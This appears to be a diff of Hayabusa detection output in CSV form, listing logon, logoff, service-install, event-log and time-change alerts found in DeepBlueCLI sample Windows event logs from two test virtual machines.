+2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account:  | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account:  | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account:  | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account:  | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
